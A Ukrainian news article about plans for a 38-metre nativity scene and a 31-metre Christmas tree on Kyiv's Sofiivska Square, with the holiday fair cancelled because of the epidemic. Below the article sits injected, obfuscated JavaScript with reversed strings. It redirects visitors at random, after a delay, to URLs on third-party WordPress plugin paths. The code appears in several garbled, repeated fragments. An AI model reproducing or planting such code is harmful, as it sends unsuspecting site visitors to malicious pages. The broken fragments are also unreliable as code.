НовиниВ Україні створять найбільший вертеп у Європі

В Україні створять найбільший вертеп у Європі

-

В Україні створять найбільший вертеп у Європі

До Нового року та Різдва центр Києва прикрасять найбільшим у Європі вертепом – декорацією, що ґрунтується на символічному відтворенні народження Христа.

Планується, що висота вертепу становитиме цілих 38 метрів – це рекордна висота вертепа для Європи. Встановлять декорацію у центрі Софійської площі. Зразкова композиція виглядатиме так: у центрі вертепу сидітиме Марія з новонародженим, а навколо них розташується безліч ангелів, колядників та мудреців.

Крім того, на Софійській площі вже розпочали облаштування новорічного містечка. За традицією монтажники передусім встановлюють святкову ялинку.  Цього року новорічна ялинка буде штучною, а її висота становитиме 31 метр. Для противаги проведуть монтаж бетонних блоків загальною вагою 100 тонн. Ялинку, як і більшість іграшок, якими її прикрасять, виготовили на львівській фабриці. А над дизайном головного новорічного символу працював президент компанії “Folk Ukraine” Ігор Добруцький.

“Цього року ми прикрасимо ялинку невеликими іграшками вітчизняного виробництва. Одна іграшка – вісім сантиметрів у діаметрі. Їх буде 20 тисяч, не менше. 75% – червоного кольору та 25% – золотого”, – розповів Добруцький.

Проте з огляду на епідеміологічну ситуацію столична мерія вирішила не встановлювати концертну сцену та не проводити традиційний новорічний ярмарок. Відкриття новорічного містечка на Софіївській площі планують у день св. Миколи 19 грудня.

$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top” data-href=”https://www.facebook.com/segodnyaonline/videos/2993300150887013/”>
Коментарі

Варте уваги ПОВ'ЯЗАНІ
Рекомендовано Вам